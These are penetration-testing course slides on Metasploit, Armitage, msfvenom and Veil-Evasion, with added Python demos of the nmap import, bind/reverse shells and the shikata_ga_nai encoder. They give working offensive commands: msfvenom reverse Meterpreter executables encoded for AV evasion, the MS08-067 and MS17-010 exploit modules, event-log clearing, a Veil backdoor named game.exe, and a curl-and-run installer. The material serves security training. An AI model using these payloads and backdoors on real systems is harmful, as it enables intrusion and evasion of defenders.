Pentest Class, Session 7 - Metasploit - Final
• Install Metasploit
• POC
Copyright ©TAALENTA
OVERVIEW METASPLOIT
• The leading exploit framework: an advanced open-source platform for
developing, testing and using exploit code, written in Ruby.
• First created by H. D. Moore in 2003 as a portable network tool written
in Perl. The Metasploit Framework was completely rewritten in Ruby in 2007.
• On October 21, 2009, Rapid7 acquired the Metasploit Project.
• Rapid7 is a security company that provides unified vulnerability
management solutions.
• Rapid7 and the security community still maintain Metasploit, constantly
updating it with new exploit modules.
OVERVIEW METASPLOIT
• METASPLOIT FRAMEWORK – the free, open-source Community Edition
• METASPLOIT PRO – the commercial Enterprise Edition sold by Rapid7
INSTALL METASPLOIT
Installation on Xubuntu (Rapid7's omnibus installer; on Kali Linux the metasploit-framework package is already installed):
Command:
sudo curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
Note: this one-liner downloads a script and executes it immediately. Fetch msfinstall first, read it, and only then run it. The omnibus installer places everything under /opt/metasploit-framework/.
START METASPLOIT
Command: msfconsole
ARCHITECTURE OF METASPLOIT
Metasploit User Interfaces
• msfconsole – the interactive console, and the most commonly used interface
• Armitage – a graphical user interface (GUI), a third-party add-on to the
Metasploit Framework
ARCHITECTURE OF METASPLOIT
[Architecture diagram, reconstructed as a list of its layers and boxes]
• REX: the base library underneath everything else
• MSF::Core: Datastore, EventDispatcher, ModuleManager, PluginManager, Framework
• MSF::Base: Config, Logging, Serializer, Simple, Sessions
• MSF::UI: Console, CLI, WebUI, GUI, Armitage
• Modules (loaded through the ModuleManager): Exploits, Payloads, Encoders, Nops, Aux (auxiliary); Plugins are loaded through the PluginManager
ARCHITECTURE OF METASPLOIT
Directories (omnibus installer layout):
/opt/metasploit-framework/
/opt/metasploit-framework/bin/ (wrapper scripts: msfconsole, msfvenom, msfdb, msfupdate)
/opt/metasploit-framework/embedded/ (bundled Ruby, gems and PostgreSQL, so the install does not depend on the system Ruby)
/opt/metasploit-framework/LICENSES
/opt/metasploit-framework/embedded/framework/ (the framework source itself)
/opt/metasploit-framework/embedded/framework/modules (exploits/, auxiliary/, payloads/, encoders/, nops/, post/; custom modules normally go under ~/.msf4/modules so updates do not overwrite them)
ARCHITECTURE OF METASPLOIT
Metasploit Libraries
Some of the most important libraries are outlined below.
REX
• The basic library used by most tasks
• Handles sockets, protocols, text transformations and more
• SSL, SMB, HTTP, XOR, Base64, Unicode
MSF::CORE
• Provides the "basic" API
• Defines the Metasploit Framework itself (modules, sessions, datastore, events)
MSF::BASE
• Provides the "friendly" API
• Simplified wrappers over Core for use by the user interfaces and scripts
BASIC COMMANDS
msf6 > help (lists the core, database and module commands with a one-line description each)
BASIC COMMANDS
Database Backend Commands (need a connected PostgreSQL database; check with db_status)
Important commands:
• db_status: show whether msfconsole is connected to the database
• db_nmap: run nmap with the given arguments and import the results into the current workspace
• workspace: list, create (-a), switch or delete (-d) workspaces; one workspace per engagement keeps client data separate
• hosts: hosts recorded in the workspace
• services: services recorded in the workspace
Examples:
msf6 > workspace -h
msf6 > db_status
msf6 > services -p 21 -c name,port,proto   (only port 21, showing the columns name, port and proto)
msf6 > services -R 192.168.1.7            (-R sets RHOSTS from the listed rows, here limited to that address, so the next module targets them without retyping)
Information gathering using db_nmap: the scan results are stored in the workspace, so hosts and services can be queried later instead of re-scanning the target.
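db_nmap wraps nmap, keeps its XML output and imports it into the workspace; hosts and services then query that stored data. The Python below is an added illustration of that data model written for this page, not Metasploit's importer: it parses a constructed nmap XML document into hosts and services tables and reproduces the semantics of services -p (port filter), -c (column projection) and -R (build an RHOSTS value). The open_only filter in rhosts_from is the example's own choice.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX output for two lab hosts (not real scan data).
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="192.168.1.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host><status state="up"/><address addr="192.168.1.9" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="closed"/>
        <service name="ftp"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH"/></port>
    </ports>
  </host>
</nmaprun>
"""


def import_nmap_xml(xml_text):
    """Model of db_nmap's import step: one hosts row per host, one services row per port."""
    hosts, services = [], []
    for h in ET.fromstring(xml_text).iter("host"):
        addr = h.find("address[@addrtype='ipv4']").get("addr")
        hosts.append({"address": addr, "state": h.find("status").get("state")})
        for p in h.iter("port"):
            svc = p.find("service")
            info = ""
            if svc is not None:
                info = " ".join(filter(None, (svc.get("product"), svc.get("version"))))
            services.append({
                "host": addr,
                "port": int(p.get("portid")),
                "proto": p.get("protocol"),
                "state": p.find("state").get("state"),
                "name": svc.get("name") if svc is not None else "",
                "info": info,
            })
    return hosts, services


def query_services(services, ports=None):
    """services -p <ports>: keep only rows whose port is in the list (None = all rows)."""
    return [s for s in services if ports is None or s["port"] in ports]


def project(rows, columns):
    """services -c <cols>: show only the named columns; host is always kept so rows stay attributable."""
    keep = ["host"] + [c for c in columns if c != "host"]
    return [{k: r[k] for k in keep} for r in rows]


def rhosts_from(rows, open_only=True):
    """services -R: turn the selected rows into an RHOSTS value (space-separated addresses).
    open_only is this example's own filter: closed ports are not worth targeting."""
    addrs = sorted({r["host"] for r in rows if not open_only or r["state"] == "open"})
    return " ".join(addrs)


if __name__ == "__main__":
    hosts, services = import_nmap_xml(SAMPLE_NMAP_XML)
    ftp = query_services(services, ports=[21])
    for row in project(ftp, ["name", "port", "proto"]):
        print(row)
    print("RHOSTS =>", rhosts_from(ftp))
```

Filtering before building RHOSTS is the point: a single `services -R` on an unfiltered table aims the next module at every host in the workspace.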
AUXILIARY
Scanning the SMB version (port 445), e.g. with the auxiliary/scanner/smb/smb_version scanner: set RHOSTS to the target range and run. Scanner modules report what they find into the workspace, so the results show up under services afterwards.
AUXILIARY
Port scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target
msf > run
(current Metasploit releases ship this module as auxiliary/gather/enum_dns)
FTP server (serves the files under FTPROOT, e.g. to deliver a payload to a target):
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
Proxy server (a SOCKS proxy on the Metasploit host; combined with session routes it lets other tools pivot through a compromised machine):
msf > use auxiliary/server/socks4
msf > run
(older releases named this module socks4a; current Metasploit ships a combined auxiliary/server/socks_proxy module)
FRAMEWORK COMPONENTS
Metasploit Meterpreter:
• An in-memory payload (on Windows delivered by reflective DLL injection) that provides control over the target system through an extensible command set, without writing its own binary to disk
msfvenom (Metasploit Venom):
• Creates standalone payloads as executables, scripts (Ruby, Perl, Python and others) or raw shellcode, optionally encoded
SHELL & METERPRETER
[Slides "SHELL" and "METERPRETER": screenshots contrasting a plain command-shell session with a Meterpreter session]
Meterpreter Commands
• sysinfo: display system information
• ps: list running processes
• kill <PID>: terminate a running process
• getuid: display the user Meterpreter is running as
• upload / download: upload or download a file
• pwd / lpwd: print working directory (remote / local)
• cd / lcd: change directory (remote / local)
• cat: display file content
• bglist: show scripts running in the background
• bgrun: run a script in the background
• bgkill: terminate a background script
• background: move the active session to the background and return to the msf prompt
• edit <file name>: edit a file in a vi-style editor
• shell: open a command shell on the target machine
• migrate <PID>: move Meterpreter into another process (e.g. a long-lived one, so the session survives if the exploited process dies)
• idletime: display how long the user has been idle
• screenshot: take a screenshot
• clearev: clear the Windows event logs (Application, System, Security). This is destructive and itself a strong indicator: Windows records the clearing as Security event 1102 / System event 104. Only with explicit authorization.
• ? / help: show all commands
• exit / quit: exit the Meterpreter session
• shutdown / reboot: shut down or restart the system
• use: load an extension
• channel: show active channels
BIND AND REVERSE SHELL
[Diagram: Attacker <-- REVERSE SHELL -- Victim PC]
Bind shell: the payload listens on a port on the victim and the attacker connects to it, so it needs an inbound path to the victim. Reverse shell: the payload connects back from the victim to a listener on the attacker (LHOST:LPORT), which works through NAT and egress-only firewalls and is therefore the usual choice.
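The diagram only shows the direction of the connection. The added Python example below (written for this page, not Metasploit code) runs both roles on localhost so the difference is visible: in bind_shell_demo the victim process listens and the attacker connects; in reverse_shell_demo the attacker listens, as exploit/multi/handler does on LHOST:LPORT, and the victim connects back. The command allow-list, the end-of-output marker and the 127.0.0.1 addresses are this example's own simplifications; a real payload hands every command to cmd.exe or /bin/sh.

```python
import shlex
import socket
import subprocess
import threading

HOST = "127.0.0.1"                               # attacker and victim both run locally here
ALLOWED = {"echo", "whoami", "id", "hostname"}   # demo allow-list; a real shell passes everything
END = b"\x00"                                    # end-of-output marker so the attacker knows when to stop reading


def victim_loop(conn):
    """Victim side: execute newline-terminated commands and stream output back."""
    buf = b""
    with conn:
        while True:
            chunk = conn.recv(4096)
            if not chunk:                        # attacker hung up
                return
            buf += chunk
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                argv = shlex.split(line.decode(errors="replace"))
                if not argv or argv[0] not in ALLOWED:
                    conn.sendall(b"refused" + END)
                    continue
                proc = subprocess.run(argv, capture_output=True, text=True)
                conn.sendall((proc.stdout + proc.stderr).encode() + END)


def attacker_run(conn, cmd):
    """Attacker side: send one command and collect its output up to the marker."""
    conn.sendall(cmd.encode() + b"\n")
    out = b""
    while not out.endswith(END):
        chunk = conn.recv(4096)
        if not chunk:
            break
        out += chunk
    return out.rstrip(END).decode().strip()


def bind_shell_demo(cmd="echo bind-ok"):
    """Bind shell: the VICTIM listens and the attacker dials in.
    Needs an inbound path to the victim, so NAT or a host firewall blocks it."""
    lsock = socket.socket()
    lsock.bind((HOST, 0))                        # port 0: let the OS pick a free port
    lsock.listen(1)
    port = lsock.getsockname()[1]

    def victim():
        conn, _ = lsock.accept()
        lsock.close()
        victim_loop(conn)

    t = threading.Thread(target=victim, daemon=True)
    t.start()
    with socket.create_connection((HOST, port)) as attacker:   # attacker -> victim
        out = attacker_run(attacker, cmd)
    t.join(timeout=5)
    return {"listener": "victim", "connects": "attacker", "output": out}


def reverse_shell_demo(cmd="echo reverse-ok"):
    """Reverse shell: the ATTACKER listens (LHOST:LPORT, like multi/handler)
    and the victim connects back, which usually passes egress-only firewalls."""
    lsock = socket.socket()
    lsock.bind((HOST, 0))
    lsock.listen(1)
    port = lsock.getsockname()[1]

    def victim():
        victim_loop(socket.create_connection((HOST, port)))    # victim -> attacker

    t = threading.Thread(target=victim, daemon=True)
    t.start()
    conn, _ = lsock.accept()
    lsock.close()
    with conn:
        out = attacker_run(conn, cmd)
    t.join(timeout=5)
    return {"listener": "attacker", "connects": "victim", "output": out}


if __name__ == "__main__":
    print(bind_shell_demo())
    print(reverse_shell_demo())
```

The only thing that changes between the two functions is who calls listen() and who calls connect(); the command loop is identical. That is also why the handler's LHOST/LPORT must match what was compiled into a reverse payload: the victim has no other way to find the listener.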
WALKTHROUGH
Exploit the target (walkthrough):
1. Exploit: use <exploit module>
Useful command:
1. Search: search <text from the module title>
MODULE EXPLOIT MS08_067_NETAPI
search <text from the module title>, e.g. ms08_067
Module: exploit/windows/smb/ms08_067_netapi
show options (lists the module options, which of them are required, and the options of the selected payload)
Set RHOSTS, PAYLOAD and LPORT (plus LHOST for a reverse payload), then run the exploit command.
Target: Windows Server 2003, using a Meterpreter payload.
Caveat: MS08-067 is a stack overflow in the Server service; a failed attempt can crash the service or the host, so confirm the target OS first and keep the attempt count low.
MODULE EXPLOIT MS17_010_PSEXEC
search <text from the module title>, e.g. ms17_010
Module: exploit/windows/smb/ms17_010_psexec
Use exploit:
use exploit/windows/smb/ms17_010_psexec
show options
Change PAYLOAD from a plain shell into Meterpreter:
set PAYLOAD windows/meterpreter/reverse_tcp
Run exploit -j to run the exploit as a background job: the handler keeps waiting, and the new session is listed under the sessions command instead of being opened in the foreground.
METERPRETER
shell: drop from Meterpreter into a Windows command prompt on the target
exit: leave the Windows shell and return to the Meterpreter prompt (a second exit closes the session)
PART II
OVERVIEW
• KEY TAKEAWAYS DAY 6
• ARMITAGE
• EXPLOIT WINDOWS 2008 SERVER
• EXPLOIT METASPLOITABLE 2
• SHIKATA_GA_NAI (MSFVENOM /Client Side Attacks)
• VEIL EVASION FRAMEWORK
ARMITAGE
Armitage is a GUI front-end for the Metasploit Framework developed by
Raphael Mudge, with the goal of helping security professionals better
understand hacking and realize the power of Metasploit. It was originally
made for cyber defense exercises, but its user base has since expanded to
other penetration testers. Armitage is no longer actively maintained, so
expect breakage with current Metasploit releases; the workflow below is
shown for reference.
SETUP ARMITAGE
Install Armitage, then bring the framework up to date:
msfupdate
Set up database.yml so Armitage uses the same database as msfconsole:
cd /opt/metasploit-framework/embedded/framework/config/
sudo cp /home/pentest/.msf4/database.yml .
export MSF_DATABASE_CONFIG="/opt/metasploit-framework/embedded/framework/config/database.yml"
msfdb reinit
(msfdb reinit drops and recreates the database, so any existing workspace data is lost; run it only on a fresh install)
Start Armitage with the environment preserved (sudo -E keeps MSF_DATABASE_CONFIG in root's environment):
sudo -E armitage
SET EXPLOIT RANK (1)
Armitage -> Set Exploit Rank: only exploits of at least the chosen rank are offered. Metasploit ranks exploits by reliability (Excellent, Great, Good, Normal, Average, Low, Manual); lower-ranked exploits are more likely to crash the target.
LISTENERS (SET LHOST) (2)
Setting the listener host (LHOST):
Set LHOST -> your machine's IP address (the one the target can reach)
REVERSE (WAIT FOR) (3)
Setting the listener type (bind or reverse):
Listeners -> Reverse (wait for), which starts a handler that waits for connect-backs
ADD HOSTS (4), ADDED 1 HOST (5)
Hosts -> Add Hosts: enter the target IP addresses
HOSTS (NMAP SCAN) (6), (7)
Nmap Scan -> Intense Scan, or Intense Scan, no ping when ICMP is filtered and the host would otherwise be skipped
HOSTS (SCAN COMPLETE) (8)
FIND ATTACKS (9), (10), (11)
Attacks -> Find Attacks: matches the scanned services against exploit modules; when the attack analysis completes, each host gets an Attack menu
HAIL MARY (12), (13), (14), (15)
Attacks -> Hail Mary launches every matching exploit against every host; progress is shown and compromised hosts are marked. This is extremely noisy and can crash services, so use it only in a lab or with explicit permission.
METERPRETER, INTERACT, METERPRETER SHELL (16), (17)
Right-click the compromised host -> Meterpreter -> Interact -> Meterpreter Shell
[Slide image: meaning of the Japanese phrase "shikata ga nai" ("it cannot be helped"), the name of the x86/shikata_ga_nai encoder]
MSFVENOM
The msfvenom tool generates Metasploit payloads (such as Meterpreter) as standalone files and optionally encodes them. It replaced the older msfpayload and msfencode tools.
Command:
Run with '-l payloads' to get a list of payloads.
$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse connection)] LPORT=[LocalPort] -e x86/shikata_ga_nai
(the encoder has to be given with -e; a bare x86/shikata_ga_nai at the end of the command line is not a valid argument)
Example
Reverse Meterpreter payload as an executable, redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 -e x86/shikata_ga_nai > cmd.exe
(-o cmd.exe writes the file directly instead of relying on shell redirection)
MSFVENOM
Format options (specified with -f)
--help-formats – list available output formats
exe – Windows executable
pl – Perl
rb – Ruby
raw – raw shellcode
c – C code
Encoding payloads with msfvenom
msfvenom can apply one or more rounds of encoding, historically used for anti-virus bypass. Run with '-l encoders' to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example
Encode a payload 10 times with the shikata_ga_nai encoder and output it as an executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 10 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Caveat: encoders exist to remove bad characters (null bytes, for example) from shellcode; they were not designed as AV evasion. The encoded body changes on every run, but the decoder stub prepended to it is well known to AV engines, and each -i iteration only nests another stub. Expect x86/shikata_ga_nai output to be flagged by current AV, which is why evasion tooling such as the Veil framework covered below exists.
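The encoder named in these commands, x86/shikata_ga_nai, is a polymorphic XOR additive-feedback encoder. The Python below is an added model of that scheme written for this page, not Metasploit's Ruby encoder, and it leaves out the x86 decoder stub and register randomization: each 4-byte block is XORed with the current key, and the decoded block is then added into the key, which is exactly the xor/add pair the decoder loop executes. The sample shellcode bytes are a constructed fragment; the random key is why the same input yields different bytes on every run.

```python
import os
import struct

MASK = 0xFFFFFFFF

# Constructed 8-byte "shellcode" fragment used as sample input (not a working payload).
SAMPLE_SHELLCODE = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68"


def _pad(buf):
    """Pad to a multiple of 4 bytes with NOPs (0x90), which x86 shellcode tolerates."""
    return buf + b"\x90" * (-len(buf) % 4)


def xor_additive_encode(shellcode, key=None):
    """Encode 4-byte blocks: c_i = p_i ^ k_i, then k_{i+1} = (k_i + p_i) mod 2^32.
    Returns (key, encoded). A fresh random key per call gives different output
    bytes for the same input: the 'polymorphic' part of the encoder."""
    if key is None:
        key = struct.unpack("<I", os.urandom(4))[0]
    data = _pad(shellcode)
    out = bytearray()
    k = key
    for i in range(0, len(data), 4):
        p = struct.unpack_from("<I", data, i)[0]
        out += struct.pack("<I", p ^ k)
        k = (k + p) & MASK          # feedback: the key depends on all plaintext so far
    return key, bytes(out)


def xor_additive_decode(key, encoded):
    """What the decoder stub does in its loop: xor [esi], eax ; add eax, [esi] ; add esi, 4."""
    out = bytearray()
    k = key
    for i in range(0, len(encoded), 4):
        c = struct.unpack_from("<I", encoded, i)[0]
        p = c ^ k
        out += struct.pack("<I", p)
        k = (k + p) & MASK          # same feedback, computed from the recovered plaintext
    return bytes(out)


def encode_iterations(shellcode, iterations, keys=None):
    """Model of `msfvenom -i N`: feed the previous output through the encoder again.
    Real msfvenom also prepends a decoder stub on every pass, so its output grows;
    here only the per-pass keys are tracked, in the order they were applied."""
    keys_used, data = [], shellcode
    for n in range(iterations):
        key, data = xor_additive_encode(data, None if keys is None else keys[n])
        keys_used.append(key)
    return keys_used, data


def decode_iterations(keys, data):
    """Undo encode_iterations: the last key applied is the first one removed."""
    for key in reversed(keys):
        data = xor_additive_decode(key, data)
    return data


if __name__ == "__main__":
    k1, e1 = xor_additive_encode(SAMPLE_SHELLCODE)
    k2, e2 = xor_additive_encode(SAMPLE_SHELLCODE)
    print("same input, different keys ->", e1.hex(), e2.hex())
    print("decoded ok:", xor_additive_decode(k1, e1) == SAMPLE_SHELLCODE)
```

Two things follow from the model. The body bytes are useless as a static signature, since only the key changes them; and the key is recoverable by anyone who can run the decoder, so this is obfuscation, not encryption. Detection therefore keys on the constant part, the decoder stub (its floating-point EIP trick plus the xor/add loop), which the model deliberately does not reproduce.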
A FEW EXAMPLES OF CREATING BACKDOORS
SETUP (Veil installation)
• Wine installation and configuration; please wait
• "Failed" error messages during the install are expected here; continue and wait
• Well done! The Veil installation is finished.
VEIL FRAMEWORK
• Running Veil-Evasion
• Available payloads
Command:
use <number>
Example:
use 7
• Payload options
Command:
set LHOST <your IP address, where the listener runs>
set LPORT <your listener port>
• Name the payload and generate the backdoor
Input name of your backdoor payload (default is payload): game
Result:
/var/lib/veil/output/compiled/game.exe
The LHOST and LPORT set here must match the Metasploit handler started later (see RUNNING LISTENER), otherwise the backdoor connects to nothing.
POC (Proof of Concept)
ADDRESS:
Example: http://192.168.1.13:8000/
[Slides 2 to 8 of this section: screenshots of the proof of concept; no text recovered]
RUNNING LISTENER
Start the handler for the generated payload and wait until the console shows exploit -j and "Started Reverse TCP handler on
<your machine's IP address / listener address>:<listener port>".
Example:
Started Reverse TCP handler on 192.168.1.13:7777
The handler's payload type, LHOST and LPORT must match what was set when the backdoor was generated (set LHOST / set LPORT in Veil); otherwise the callback never arrives.
ENTER METERPRETER
[Screenshots: the Meterpreter session that opens once the backdoor connects back to the handler]
THANK YOU